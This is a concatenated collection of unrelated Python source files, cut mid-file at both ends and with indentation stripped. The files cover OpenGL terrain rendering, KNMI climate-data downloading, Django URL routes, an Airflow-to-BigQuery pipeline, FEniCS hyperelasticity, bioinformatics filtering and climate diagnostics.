glBufferData(GL_ARRAY_BUFFER, numpy.array(row,dtype='float32'), GL_STATIC_DRAW)
glBindBuffer(GL_ARRAY_BUFFER, normal_buffer)
glBufferData(GL_ARRAY_BUFFER, numpy.array(norms,dtype='float32'), GL_STATIC_DRAW)
glBindBuffer(GL_ARRAY_BUFFER, texture_buffer)
glBufferData(GL_ARRAY_BUFFER, numpy.array(tex,dtype='float32'), GL_STATIC_DRAW)
vertex_buffer += 1
normal_buffer += 1
texture_buffer += 1
def draw():
glEnableClientState(GL_VERTEX_ARRAY)
if OPTS_ENABLE_NORMALS: glEnableClientState(GL_NORMAL_ARRAY)
if OPTS_ENABLE_TEXTURES: glEnableClientState(GL_TEXTURE_COORD_ARRAY)
for i in range(DATA_SIZE):
vertex_buffer = VERTEX_BUFFERS+i
normal_buffer = NORMAL_BUFFERS+i
texture_buffer = TEXTURE_BUFFERS+i
glBindBuffer(GL_ARRAY_BUFFER, texture_buffer)
glTexCoordPointer(2, GL_FLOAT, 0, None)
glBindBuffer(GL_ARRAY_BUFFER, vertex_buffer)
glVertexPointer(3, GL_FLOAT, 0, None)
glBindBuffer(GL_ARRAY_BUFFER, normal_buffer)
glNormalPointer(GL_FLOAT, 0, None)
glDrawArrays(GL_TRIANGLE_STRIP, 0, (DATA_SIZE*4)-1)
if OPTS_ENABLE_NORMALS: glDisableClientState(GL_NORMAL_ARRAY);
if OPTS_ENABLE_TEXTURES: glDisableClientState(GL_TEXTURE_COORD_ARRAY)
glDisableClientState(GL_VERTEX_ARRAY)
'''
def draw(data):
world_width = 1.0
modifier = 5
x_pos = world_width
y_pos = world_width
glBindTexture(GL_TEXTURE_2D, texture) # pick the texture.
#y = 0
for x in range(len(data)-1):
glBegin(GL_TRIANGLE_STRIP)
for y in range(len(data[x])-1):
if (y % len(data)) == 0:
y_pos = world_width
z_pos = (1.0/255.)*float(data[x][y])*modifier
z_pos_a = (1.0/255.)*float(data[x][y+1])*modifier
z_pos_b = (1.0/255.)*float(data[x+1][y])*modifier
z_pos_c = (1.0/255.)*float(data[x+1][y+1])*modifier
v1 = Vector3(x_pos, y_pos, z_pos)
v2 = Vector3(x_pos, y_pos+world_width, z_pos_a)
v3 = Vector3(x_pos+world_width, y_pos, z_pos_b)
v4 = Vector3(x_pos+world_width, y_pos+world_width, z_pos_c)
vector = v1+v2+v3+v4
glNormal3dv(vector.normalize().as_tuple())
glTexCoord2f(x_pos,y_pos)
glVertex3f(x_pos, y_pos, z_pos);
glTexCoord2f(x_pos,y_pos+world_width)
glVertex3f(x_pos, y_pos+world_width, z_pos_a);
glTexCoord2f(x_pos+world_width,y_pos)
glVertex3f(x_pos+world_width, y_pos, z_pos_b);
glTexCoord2f(x_pos+world_width, y_pos+world_width);
glVertex3f(x_pos+world_width, y_pos+world_width, z_pos_c);
y_pos += world_width
x_pos += world_width
glEnd()
def draw_points(data):
world_width = 1.0
modifier = 5
x_pos = world_width
y_pos = world_width
y = 0
for x in range(len(data)-1):
glBegin(GL_TRIANGLE_STRIP)
for y in range(len(data[x])-1):
if (y % len(data)) == 0:
y_pos = world_width
z_pos = (1.0/255.)*float(data[x][y])*modifier
z_pos_a = (1.0/255.)*float(data[x][y+1])*modifier
z_pos_b = (1.0/255.)*float(data[x+1][y])*modifier
z_pos_c = (1.0/255.)*float(data[x+1][y+1])*modifier
v1 = Vector3(x_pos, y_pos, z_pos)
v2 = Vector3(x_pos, y_pos+world_width, z_pos_a)
v3 = Vector3(x_pos+world_width, y_pos, z_pos_b)
v4 = Vector3(x_pos+world_width, y_pos+world_width, z_pos_c)
vector = v1+v2+v3+v4
glNormal3dv(vector.normalize().as_tuple())
glEdgeFlag(GL_FALSE)
vector = v1+v2+v3+v4
glVertex3f(x_pos, y_pos, z_pos);
glVertex3f(x_pos, y_pos+world_width, z_pos_a);
glVertex3f(x_pos+world_width, y_pos, z_pos_b);
glVertex3f(x_pos+world_width, y_pos+world_width, z_pos_c);
y_pos += world_width
x_pos += world_width
glEnd()
'''
def run():
pygame.init()
screen = pygame.display.set_mode(SCREEN_SIZE, HWSURFACE|OPENGL|DOUBLEBUF)
resize(*SCREEN_SIZE)
init()
clock = pygame.time.Clock()
# Camera transform matrix
camera_matrix = Matrix44()
camera_matrix.translate = (16.0, 16.0, 20.0)
# white ambient light at half intensity (rgba)
LightAmbient = [ 0.2, 0.5, 1.0, 0.1 ]
# super bright, full intensity diffuse light.
LightDiffuse = [ 0.0, 0.0, 1, 0.5 ]
# position of light (x, y, z, (position of light))
LightPosition = [ 32.0, 16.0, 5, 0.0 ]
light_x = 1.0
light_y = 1.0
# Initialize speeds and directions
rotation_direction = Vector3()
rotation_speed = radians(90.0)
movement_direction = Vector3()
movement_speed = 10.0
bind_data_arrays(get_perlin_data((DATA_SIZE, DATA_SIZE), 16.0, 2), DATA_SIZE)
while True:
for event in pygame.event.get():
if event.type == QUIT:
return
if event.type == KEYUP and event.key == K_ESCAPE:
return
# Clear the screen, and z-buffer
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT);
time_passed = clock.tick(30)
time_passed_seconds = time_passed / 1000.
pressed = pygame.key.get_pressed()
# Reset rotation and movement directions
rotation_direction.set(0.0, 0.0, 0.0)
movement_direction.set(0.0, 0.0, 0.0)
# Modify direction vectors for key presses
if pressed[K_LEFT]:
rotation_direction.y = +1.0
elif pressed[K_RIGHT]:
rotation_direction.y = -1.0
if pressed[K_UP]:
rotation_direction.x = -1.0
elif pressed[K_DOWN]:
rotation_direction.x = +1.0
if pressed[K_z]:
rotation_direction.z = -1.0
elif pressed[K_x]:
rotation_direction.z = +1.0
if pressed[K_q]:
movement_direction.z = -1.0
elif pressed[K_a]:
movement_direction.z = +1.0
if pressed[K_i]:
light_x = light_x+1.0
elif pressed[K_k]:
light_x = light_x-1.0
if pressed[K_j]:
light_y = light_y-1.0
elif pressed[K_l]:
light_y = light_y+1.0
# Calculate rotation matrix and multiply by camera matrix
rotation = rotation_direction * rotation_speed * time_passed_seconds
rotation_matrix = Matrix44.xyz_rotation(*rotation)
camera_matrix *= rotation_matrix
# Calcluate movment and add it to camera matrix translate
heading = Vector3(camera_matrix.forward)
movement = heading * movement_direction.z * movement_speed
camera_matrix.translate += movement * time_passed_seconds
# Upload the inverse camera matrix to OpenGL
glLoadMatrixd(camera_matrix.get_inverse().to_opengl())
# Light must be transformed as well
#glLight(GL_LIGHT0, GL_POSITION, (0, 1.5, 1, 0))
# set up light number 1.
glShadeModel(GL_SMOOTH)
#glLightfv(GL_LIGHT1, GL_AMBIENT, LightAmbient) # add lighting. (ambient)
glLight(GL_LIGHT0, GL_POSITION, [light_x, light_y, 0.0, 0.25])
# draw textures
# draw(data)
# draw with arrays
draw()
# draw points
#draw_points(data)
# Show the screen
pygame.display.flip()
if __name__ == "__main__":
run()
|
import datetime
import requests
import os
import argparse
import re
import numpy as np
import dask
import dask.array as da
import dask.bag as db
import gdal, ogr, gdalnumeric, gdalconst
from pathlib import Path
from utils.set_up_database import set_up_database
class User_input_pipeline(object):
start_date = None
end_date = None
parent_folder = ''
target_folder = ''
def __init__(self, parent_folder='./data'):
self.parent_folder = parent_folder
self._check_create_folder(self.parent_folder)
def set_start_date(self, start_date):
self.start_date = start_date
def set_end_date(self, end_date):
self.end_date = end_date
def set_target_folder(self, target_folder):
self.target_folder = target_folder
self._check_create_folder(self.target_folder)
def _check_create_folder(self, folder_name):
if not os.path.isdir(folder_name):
os.mkdir(folder_name)
os.chdir(folder_name)
class Knmi_data_source_retrieval(User_input_pipeline):
def __init__(self, parent_folder='./data'):
User_input_pipeline.__init__(self, parent_folder)
super().__init__(parent_folder)
def download_knmi_source_files(self, variables):
base_url = 'http://projects.knmi.nl/klimatologie/daggegevens/getdata_dag.cgi'
# base_url = 'https://cdn.knmi.nl/knmi/map/page/klimatologie/gegevens/daggegevens/jaar.zip'
days_timedelta = self.end_date - self.start_date
days_int = days_timedelta.days
if days_int < 0:
raise Exception('Start date should be set before end date')
variables_download = ':'.join(variables)
current_day_to_download_end = self.start_date + datetime.timedelta(days_int)
current_day_to_download_formatted = self.start_date.strftime('%Y%m%d')
current_day_to_download_end_formatted = current_day_to_download_end.strftime('%Y%m%d')
http_request_params = {
'stns': 'ALL',
'start': current_day_to_download_formatted,
'end': current_day_to_download_end_formatted,
'vars': variables_download
}
http_knmi_source_request_handler = Knmi_http_request_handler(base_url)
http_knmi_source_request_handler.set_http_request_params(http_request_params)
try:
response = http_knmi_source_request_handler.handle_http_request()
result = response.text
self.__text_to_database(result)
fn = 'knmi_source_' + current_day_to_download_formatted + '_to_' + current_day_to_download_end_formatted + '.txt'
outFile=open(fn, "w")
outFile.write(result)
outFile.close()
print ('file has been created : ' + fn)
except Exception as e: print(e)
def __text_to_database(self, input_raw_data):
raw_data_split = input_raw_data.split('\n')
db_query_manager = set_up_database()
insert_dataset = []
for line in raw_data_split:
line = re.sub(r" +", "", line)
if len(line) > 1 and line[0] != '#':
line_format = line.rstrip().split(',')
line_format_with_null = [x if x != '' else 'NULL' for x in line_format]
insert_dataset.append(line_format_with_null)
print(line)
db_query_manager.insert_data(insert_dataset)
class Knmi_interpolated_raster_retrieval(User_input_pipeline):
api_key = ''
dataset_raster = {}
def __init__(self, parent_folder='./data'):
User_input_pipeline.__init__(self, parent_folder)
super().__init__(parent_folder)
def set_dataset_raster(self, dataset_raster):
self.dataset_raster = dataset_raster
def set_api_key(self, api_key):
self.api_key = api_key[self.dataset_raster['name']]
def __get_api_list_files(self):
api_url = 'https://api.dataplatform.knmi.nl/open-data'
api_version = 'v1'
dataset_name = self.dataset_raster['name']
dataset_version = self.dataset_raster['version']
ensembled_url = f'{api_url}/{api_version}/datasets/{dataset_name}/versions/{dataset_version}/files'
timestamp_pattern = self.start_date.strftime('%Y%m%d')
dataset_name_upper = dataset_name.upper()
start_after_filename_prefix = f'INTER_OPER_R___{dataset_name_upper}____L3__{timestamp_pattern}'
ensembled_url = f'{api_url}/{api_version}/datasets/{dataset_name}/versions/{dataset_version}/files'
days_timedelta = self.end_date - self.start_date
days_int = days_timedelta.days
if days_int < 1:
raise Exception('Start date should be set before end date')
http_request_params = {
'maxKeys': str(days_int + 1),
'Access-Control-Allow-Origin': '*',
'startAfterFilename': start_after_filename_prefix
}
http_request_headers = {'Authorization': self.api_key}
http_raster_list_request_handler = Knmi_http_request_handler(ensembled_url)
http_raster_list_request_handler.set_http_request_params(http_request_params)
http_raster_list_request_handler.set_http_request_headers(http_request_headers)
list_files_response = http_raster_list_request_handler.handle_http_request()
list_files = list_files_response.json()
dataset_files = list_files.get('files')
return dataset_files
def __get_temporary_download_url(self, file):
filename = file.get('filename')
api_url = 'https://api.dataplatform.knmi.nl/open-data'
api_version = 'v1'
dataset_name = self.dataset_raster['name']
dataset_version = self.dataset_raster['version']
endpoint = f'{api_url}/{api_version}/datasets/{dataset_name}/versions/{dataset_version}/files/{filename}/url'
http_request_headers = {'Authorization': self.api_key}
http_raster_url_request_handler = Knmi_http_request_handler(endpoint)
http_raster_url_request_handler.set_http_request_headers(http_request_headers)
url_response = http_raster_url_request_handler.handle_http_request()
download_url = url_response.json().get('temporaryDownloadUrl')
return download_url
def __download_knmi_raster(self, file, knmi_url_download):
filename = file.get('filename')
http_raster_request = Knmi_http_request_handler(knmi_url_download)
url_response = http_raster_request.handle_http_request()
p = Path(filename)
p.write_bytes(url_response.content)
print(f'{filename} created successfully')
def download_knmi_interpolated_rasters(self):
list_rasters_download = self.__get_api_list_files()
for file in list_rasters_download:
download_url = self.__get_temporary_download_url(file)
self.__download_knmi_raster(file, download_url)
class Knmi_http_request_handler(object):
base_url_request = ''
params_url_request = {}
headers_url_request = {}
def __init__(self, base_url):
self.base_url_request = base_url
def set_http_request_params(self, params_url_request):
self.params_url_request = params_url_request
def set_http_request_headers(self, headers_url_request):
self.headers_url_request = headers_url_request
def handle_http_request(self):
try:
r = requests.get(
self.base_url_request,
headers = self.headers_url_request,
params = self.params_url_request
)
r.raise_for_status()
return r.content
except requests.exceptions.HTTPError as e:
print (e.response.text)
class knmi_collector(User_input_pipeline):
collect_climate_vars_names = ['# STN', 'YYYYMMDD', 'TN', 'TX', 'RH', 'EV24', 'UG', 'TG']
def __init__(self, parent_folder):
User_input_pipeline.__init__(self, parent_folder)
super().__init__(parent_folder)
def read_knmi_all_stations_file(self):
base_url = 'https://cdn.knmi.nl/knmi/map/page/klimatologie/gegevens/daggegevens/jaar.zip'
temp_filename = 'temp_data.zip'
http_request_params = {}
http_knmi_source_request_handler = Knmi_http_request_handler(base_url)
http_knmi_source_request_handler.set_http_request_params(http_request_params)
try:
response = http_knmi_source_request_handler.handle_http_request()
result = response
with open(temp_filename, 'wb') as compressed_knmi_data:
compressed_knmi_data.write(result)
raw_knmi_station_data = db.read_text(temp_filename, compression='zip')
cleaned_knmi_station_data = self.clean_knmi_raw_data(raw_knmi_station_data)
filtered_dataframe = self.get_knmi_columns(cleaned_knmi_station_data)
for str_date in self.get_current_last_dates():
filtered_dates = self.filter_dates_knmi(filtered_dataframe, str_date)
filename_current = '{0}.csv'.format(str_date)
filtered_dates.to_csv(filename_current, index=False, single_file = True)
return filtered_dates
except Exception as e: print(e)
def clean_knmi_raw_data(self, raw_data):
stripped_rows = db.map(lambda x:x.lstrip(), raw_data)
stripped_no_blanks = stripped_rows.filter(lambda x:x!='')
filtered_knmi_data = self.get_knmi_current_stations_data(stripped_no_blanks)
return(filtered_knmi_data)
def get_knmi_current_stations_data(self, knmi_data_bag):
filtered_csv_no_csv = knmi_data_bag.filter(lambda x:re.match('[^0-9]', x[0]))
filtered_csv_only_titles = knmi_data_bag.filter(lambda x:x[0]=='#')
filtered_csv_only_values = knmi_data_bag.filter(lambda x:re.match('[0-9]', x[0]))
titles_row = filtered_csv_only_titles.map(lambda x: x.strip().split(',')).compute()[0]
titles_row_strip = list(map(lambda x:x.lstrip(), titles_row))
tiles_dict = dict(zip(range(len(titles_row_strip)), titles_row_strip))
knmi_stations_dataframe_allyear = filtered_csv_only_values.map(lambda x: x.strip().split(',')).to_dataframe()
knmi_stations_dataframe_allyear_renamed = knmi_stations_dataframe_allyear.rename(columns=tiles_dict)
return knmi_stations_dataframe_allyear_renamed
def get_knmi_columns(self, knmi_all_columns):
knmi_filtered_columns = knmi_all_columns[self.collect_climate_vars_names]
return knmi_filtered_columns
def filter_dates_knmi(self, knmi_filtered_columns, str_date):
filetered_dates = knmi_filtered_columns[knmi_filtered_columns.YYYYMMDD == str_date]
return filetered_dates
def get_current_last_dates(self):
todays_date = datetime.date.today()
dates_list = []
days_timedelta = self.end_date - self.start_date
days_int = days_timedelta.days
if days_int < 0:
raise Exception('Start date should be set before end date')
for days_past in range(1, days_int):
current_date = self.end_date - datetime.timedelta(days_past)
dates_list.append(datetime.datetime.strftime(current_date, '%Y%m%d'))
return dates_list
def remove_temp_files(self, wild_card = 'zip'):
test = os.listdir('.')
for item in test:
if item.endswith("{0}".format(wild_card)):
os.remove(item)
def add_head_files(self):
absolute_path = os.path.join(self.parent_folder, self.target_folder)
filenames = [file for file in os.listdir('.') if file.split('.')[1] == 'csv']
for file in filenames:
with open(file, 'r') as input_file:
with open('coordinate_info.txt', 'r') as coordinate_file:
with open('{0}.txt'.format(file.split('.')[0]),'w') as newf:
newf.write(coordinate_file.read())
newf.write(input_file.read())
|
from django.conf.urls import url
from .views import AddNotice, ApiViewSet, NoticeYear, NoticeBranch, NoticeBranchYear
urlpatterns = [
url(r'^addnotices/$', AddNotice.as_view()),
url(r'^notices/$', ApiViewSet.as_view()),
url(r'^notices/year/', NoticeYear.as_view()),
url(r'^notices/branch/', NoticeBranch.as_view()),
url(r'^notices/branchyear/', NoticeBranchYear.as_view())
]
|
import airflow
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.python_operator import BranchPythonOperator
from airflow.operators.http_operator import SimpleHttpOperator
from airflow_training.operators.postgres_to_gcs import (
PostgresToGoogleCloudStorageOperator,
)
from airflow.operators import BaseOperator
from airflow.utils.decorators import apply_defaults
from airflow.hooks.http_hook import HttpHook
from airflow.contrib.hooks.gcs_hook import GoogleCloudStorageHook
from airflow.contrib.operators.dataproc_operator import (
DataprocClusterCreateOperator,
DataProcPySparkOperator,
DataprocClusterDeleteOperator,
)
from airflow_training.operators.gcs_to_bq import GoogleCloudStorageToBigQueryOperator
import json
class MyOwnOperator(BaseOperator):
template_fields = ("http_endpoint", "gcs_filename")
@apply_defaults
def __init__(
self,
http_endpoint,
http_connection_id,
gcs_connection_id,
gcs_bucket,
gcs_filename,
*args,
**kwargs
):
super().__init__(*args, **kwargs)
self.http_endpoint = http_endpoint
self.http_connection_id = http_connection_id
self.gcs_connection_id = gcs_connection_id
self.gcs_bucket = gcs_bucket
self.gcs_filename = gcs_filename
def execute(self, context):
print("exec")
r = self._download_from_http()
r = json.loads(r)
with open("data.json", "w") as outfile:
json.dump(r, outfile)
self._upload_to_gcs()
def _upload_to_gcs(self):
"""
Upload all of the file splits (and optionally the schema .json file) to
Google Cloud Storage.
"""
hook = GoogleCloudStorageHook(
google_cloud_storage_conn_id=self.gcs_connection_id
)
hook.upload(self.gcs_bucket, self.gcs_filename, "data.json", "application/json")
def _download_from_http(self):
http = HttpHook("GET", http_conn_id=self.http_connection_id)
self.log.info("Calling HTTP method")
response = http.run(self.http_endpoint)
self.log.info(response.text)
return response.text
dag = DAG(
dag_id="superjob",
default_args={
"owner": "naamhierinvullen",
"start_date": airflow.utils.dates.days_ago(7),
},
schedule_interval="@daily",
catchup=False,
)
dataproc_create_cluster = DataprocClusterCreateOperator(
task_id="dataproc_create_cluster",
cluster_name="analyse-pricing-{{ ds }}",
project_id="airflowbolcom-may2829-b2a87b4d",
num_workers=2,
zone="europe-west4-a",
dag=dag,
)
dataproc_remove_cluster = DataprocClusterDeleteOperator(
task_id="dataproc_remove_cluster",
cluster_name="analyse-pricing-{{ ds }}",
project_id="airflowbolcom-may2829-b2a87b4d",
dag=dag,
)
dataproc_run_pyspark = DataProcPySparkOperator(
task_id="dataproc_run_pyspark",
main="gs://een_emmer/build_statistics.py",
cluster_name="analyse-pricing-{{ ds }}",
arguments=[
"gs://een_emmer/daily_load_{{ ds }}",
"gs://een_emmer/exchangerate_{{ ds }}.txt",
"gs://een_emmer/dataproc_output_{{ ds }}",
],
dag=dag,
)
prices_uk_from_postgres_to_cloudstorage = PostgresToGoogleCloudStorageOperator(
task_id="prices_uk_from_postgres_to_cloudstorage",
sql="SELECT * FROM land_registry_price_paid_uk WHERE transfer_date = '{{ ds }}'",
bucket="een_emmer",
filename="daily_load_{{ ds }}",
postgres_conn_id="stuff_postgres",
dag=dag,
)
exchange_rate_to_gcs = MyOwnOperator(
task_id="exchange_rate_to_gcs",
dag=dag,
http_connection_id="http_exchangerate",
http_endpoint="/airflow-training-transform-valutas?date={{ ds }}&to=EUR",
gcs_connection_id="google_cloud_default",
gcs_bucket="een_emmer",
gcs_filename="exchangerate_{{ ds }}.txt",
)
write_to_bq = GoogleCloudStorageToBigQueryOperator(
task_id="write_to_bq",
bucket="een_emmer",
source_objects=["dataproc_output_{{ ds }}/part*.parquet"],
destination_project_dataset_table="airflowbolcom-may2829-b2a87b4d:ditiseendataset.land_registry_prices{{ ds_nodash }}",
source_format="PARQUET",
write_disposition="WRITE_TRUNCATE",
dag=dag,)
[
prices_uk_from_postgres_to_cloudstorage,
exchange_rate_to_gcs,
] >> dataproc_create_cluster >> dataproc_run_pyspark >> dataproc_remove_cluster >> write_to_bq
|
#!/usr/bin/env python3
import sys, argparse
from pathlib import Path
from Bio import SeqIO
def main():
print("""Size selector""")
parser = argparse.ArgumentParser()
parser.add_argument("--in", type=str,
action="store", dest="input",
help="Path to sequence file")
parser.add_argument("--minlen", type=int,
action="store", dest="minlen",
help="Minimum sequence size (inclusive)")
parser.add_argument("--out", type=str,
action="store", dest="output",
help="Output path. Will create directory if it doesn't exist. Default='./<input>.min<minsize>.<filetype>'")
# Parse arguments
if len(sys.argv) == 1:
parser.print_help(sys.stderr)
sys.exit(1)
args = parser.parse_args()
fasta = Path(args.input)
seqtype = fasta.suffix.split(".")[-1]
longseqs = []
i=0
with open(fasta, "r") as handle:
for record in SeqIO.parse(handle, seqtype):
if len(record.seq) >= int(args.minlen):
longseqs.append(record)
i+=1
if args.output is not None:
output = Path(args.output)
else:
output = Path("{}.min{}{}".format(fasta.stem, args.minlen, fasta.suffix))
if not output.parent.exists():
output.parent.mkdir(parents=True, exist_ok=True)
SeqIO.write(longseqs, output, seqtype)
print("{} original sequences\n{} less than {}\n{} sequences written to {}".format(i, i-len(longseqs), args.minlen, len(longseqs), output))
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if __name__ == "__main__":
main()
|
"""
Profile Page app API URLs.
"""
from django.urls import path
from profile_page.api import api
from . import views
urlpatterns = [
# Views
path('', views.profile_page, name='profile-page'),
# Profile Page API Calls for Authentication
path('api', api.api_overview, name='profile-page-api_overview'),
path('api/register', api.register, name='profile-page-register'),
path('api/login', api.login, name='profile-page-login'),
path('api/logout', api.logout, name='profile-page-logout'),
path('api/delete', api.delete, name='profile-page-delete'),
# Get all profile information
path('api/profile', api.profile, name='profile-page-profile'),
# Adding, removing, and accepting friend
path('api/add_friend', api.add_friend, name='profile-page-add_friend'),
path('api/accept_decline_friend', api.accept_decline_friend, name='profile-page-accept_friend'),
path('api/remove_friend', api.remove_friend, name='profile-page-remove_friend'),
# Game Board Import/Export API calls
path('api/save_board', api.save_board, name='profile-save_board'),
path('api/delete_board', api.delete_board, name='profile-delete_board'),
path('api/share', api.share, name='profile-share'),
path('api/saved_boards/<str:user_id>/<str:token>', api.saved_boards, name='profile-saved_boards'),
path('api/load_board', api.load_board, name='profile-load_board'),
# Heroku scheduler
path('api/scheduled_tasks', api.scheduled_tasks, name='profile-scheduled_tasks'),
]
|
class Solution(object):
def numMagicSquaresInside(self, grid):
"""
:type grid: List[List[int]]
:rtype: int
"""
result = 0
for y in range(2, len(grid)):
for x in range(2, len(grid[y])):
sum = grid[y][x-2] + grid[y][x-1] + grid[y][x]
if self.numbersBetween1To9(grid, x, y) \
and sum == grid[y-2][x-1] + grid[y-1][x-1] + grid[y][x-1] \
and sum == grid[y-2][x-2] + grid[y-1][x-2] + grid[y][x-2] \
and sum == grid[y][x-2] + grid[y][x-1] + grid[y][x] \
and sum == grid[y-1][x-2] + grid[y-1][x-1] + grid[y-1][x] \
and sum == grid[y-2][x-2] + grid[y-2][x-1] + grid[y-2][x] \
and sum == grid[y][x] + grid[y-1][x-1] + grid[y-2][x-2] \
and sum == grid[y-2][x] + grid[y-1][x-1] + grid[y][x-2]:
result += 1
return result
def numbersBetween1To9(self, grid, x, y):
for i in range(y-2,y+1):
for j in range(x-2,x+1):
if grid[i][j] > 9 or grid[i][j] < 1:
return False
return True
solution = Solution()
print(solution.numMagicSquaresInside([[4,3,8,4],[9,5,1,9],[2,7,6,2]]))
print(solution.numMagicSquaresInside([[7,0,5],[2,4,6],[3,8,1]]))
print(solution.numMagicSquaresInside([[10,3,5],[1,6,11],[7,9,2]]))
print(solution.numMagicSquaresInside([[7,6,2,2,4],[4,4,9,2,10],[9,7,8,3,10],[8,1,9,7,5],[7,10,4,11,6]])) |
import fenics as fa
# Deformation gradient
def DeformationGradient(u):
I = fa.Identity(u.geometric_dimension())
return fa.variable(I + fa.grad(u))
# Determinant of the deformation gradient
def DetDeformationGradient(u):
F = DeformationGradient(u)
return fa.variable(fa.det(F))
# Right Cauchy-Green tensor
def RightCauchyGreen(F):
return fa.variable(F.T * F)
# Invariants of an arbitrary tensor, A
def Invariants(A):
I1 = fa.tr(A)
I2 = 0.5 * (fa.tr(A)**2 - fa.tr(A * A))
I3 = fa.det(A)
return [I1, I2, I3]
def NeoHookeanEnergy(u, young_modulus, poisson_ratio, return_stress=False, fluctuation=False, F_list=None):
if poisson_ratio >= 0.5:
raise ValueError(
"Poisson's ratio must be below isotropic upper limit 0.5. Found {}"
.format(poisson_ratio))
if fluctuation:
return NeoHookeanEnergyFluctuation(u, young_modulus, poisson_ratio, return_stress, F_list)
shear_mod = young_modulus / (2 * (1 + poisson_ratio))
bulk_mod = young_modulus / (3 * (1 - 2*poisson_ratio))
d = u.geometric_dimension()
F = DeformationGradient(u)
F = fa.variable(F)
J = fa.det(F)
I1 = fa.tr(RightCauchyGreen(F))
# Plane strain assumption
Jinv = J**(-2 / 3)
energy = ((shear_mod / 2) * (Jinv * (I1 + 1) - 3) +
(bulk_mod / 2) * (J - 1)**2)
# Pure 2d assumption
# Jinv = J**(-2 / d)
# energy = ((shear_mod / 2) * (Jinv * I1 - d) +
# (bulk_mod / 2) * (J - 1)**2)
if return_stress:
FinvT = fa.inv(F).T
first_pk_stress = (Jinv * shear_mod * (F - (1 / 3) * (I1 + 1) * FinvT) +
J * bulk_mod * (J - 1) * FinvT)
first_pk_stress = fa.diff(energy, F)
return energy, first_pk_stress
return energy
# Deformation gradient
def DeformationGradientFluctuation(v, F_list):
F_I = fa.as_matrix(F_list)
grad_u = fa.grad(v) + F_I
I = fa.Identity(v.geometric_dimension())
return fa.variable(I + grad_u)
def NeoHookeanEnergyFluctuation(v, young_modulus, poisson_ratio, return_stress, F_list):
shear_mod = young_modulus / (2 * (1 + poisson_ratio))
bulk_mod = young_modulus / (3 * (1 - 2*poisson_ratio))
d = v.geometric_dimension()
F = DeformationGradientFluctuation(v, F_list)
F = fa.variable(F)
J = fa.det(F)
Jinv = J**(-2 / 3)
I1 = fa.tr(RightCauchyGreen(F))
energy = ((shear_mod / 2) * (Jinv * (I1 + 1) - 3) +
(bulk_mod / 2) * (J - 1)**2)
if return_stress:
first_pk_stress = fa.diff(energy, F)
return energy, first_pk_stress
return energy
|
import random
__all__ = ['say']
def say(*args, **kwargs):
if not all(isinstance(item, str) or callable(item)
for item in args):
raise ValueError('Each argument of say(...) must be str or callable')
response = kwargs.copy()
phrases = [item for item in args if isinstance(item, str)]
if phrases:
response['text'] = random.choice(phrases)
if 'end_session' not in response:
response['end_session'] = False
for item in args:
if callable(item):
item(response)
return response
|
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 14 11:53:19 2017
@author: cvpr
"""
import xlrd
data = xlrd.open_workbook('./csiq.DMOS.xlsx')
try:
sheet = data.sheet_by_name('all_by_distortion')
except:
print 'No sheet named: all_by_distortion'
exit(0)
sheet_len = len(sheet.col(3))-4
file_path = './csiq_label.txt'
f_ptr = open(file_path, 'wt')
for i in range(sheet_len):
dst_type = sheet.col(4)[i+4].value
image = sheet.col(5)[i+4].value
dst_lev = sheet.col(6)[i+4].value
dmos = sheet.col(11)[i+4].value
if dst_type == 'noise':
dst_type = 'AWGN'
elif dst_type == 'jpeg' or dst_type == 'blur':
dst_type = dst_type.upper()
elif dst_type[:4] == 'jpeg':
dst_type = 'jpeg2000'
else:
dst_type = dst_type
#print image, dst_type, dst_lev, dmos
if type(image) == float:
image = str(int(image))
img_name = image + '.' + dst_type + '.' + str(int(dst_lev)) + '.png'
f_ptr.write('{:s} {:.6f}\n'.format(img_name, dmos))
f_ptr.close()
|
import os
from acme_diags.parameter.core_parameter import CoreParameter
from acme_diags.parameter.area_mean_time_series_parameter import AreaMeanTimeSeriesParameter
from acme_diags.run import runner
param = CoreParameter()
#For compy
machine_path_prefix = '/compyfs/e3sm_diags_data/'
#For cori
#machine_path_prefix = '/global/project/projectdirs/acme/acme_diags'
param.test_data_path = os.path.join(machine_path_prefix, 'test_model_data_for_acme_diags/time-series/E3SM_v1_historical_r1/')
#param.reference_data_path = os.path.join(machine_path_prefix, 'obs_for_e3sm_diags/time-series/')
param.reference_data_path = os.path.join(machine_path_prefix, 'test_model_data_for_acme_diags/time-series/')
param.test_name = 'e3sm_v1'
param.rune_type = 'model-vs-model'
prefix = '/compyfs/www/zhan429/examples/'
param.results_dir = os.path.join(prefix, 'area_mean_with_models')
param.multiprocessing = True
param.num_workers = 40
# We're passing in this new object as well, in
# addtion to the CoreParameter object.
ts_param = AreaMeanTimeSeriesParameter()
ts_param.ref_names = ['E3SM_v1_historical_r2', 'E3SM_v1_historical_r3', 'E3SM_v1_historical_r4', 'E3SM_v1_historical_r5'] #This setting plot model data only
ts_param.start_yr = '1850'
ts_param.end_yr = '2014'
runner.sets_to_run = ['area_mean_time_series']
runner.run_diags([param, ts_param])
|
import os
import logging
from matplotlib.dates import date2num
from calendar import monthrange
import numpy as np
import IncludeFile as IncF
# import datetime as dt
from datetime import datetime, timedelta, date
import pdb
import sys
import bisect
import pandas as pds
import mospat_inc_directories as IncDir
import datetime as dt
from INetwork import INetwork
import networkNames as names
class CR2(INetwork):
def setName(self):
return names.cr2_data
def read(self, c_Variables):
c_Network = self.name
logging.info('READING CR2 DATA')
c_ObsDir = IncDir.c_ObsNetDir
c_ObsNetName = IncDir.c_ObsNetName
t_VarsUnits = {'TEMP': 'degC', 'PRECIP': 'mm/day'}
idx_Network = c_ObsNetName.index(c_Network)
c_DataDirectory = c_ObsDir[idx_Network]
if c_Variables == 'TEMP':
c_VarDir = 'cr2_tasDaily_2018'
c_File = 'cr2_tasDaily_2018.txt'
c_TimeFrec = 'Daily'
c_FileDir = c_DataDirectory + c_Variables[:] + '/' + c_VarDir + '/'
c_FileName = c_FileDir + c_File
# df=pd.read_csv(c_FileName,delimiter=',', skiprows=15, index_col=0)
df = pds.read_csv(c_FileName, delimiter=',', index_col=0)
f_Data = df.as_matrix()
nstations = f_Data.shape[1]
# Creating Vectors with Names, Height, Longitude and Latitude
c_AllStations = []
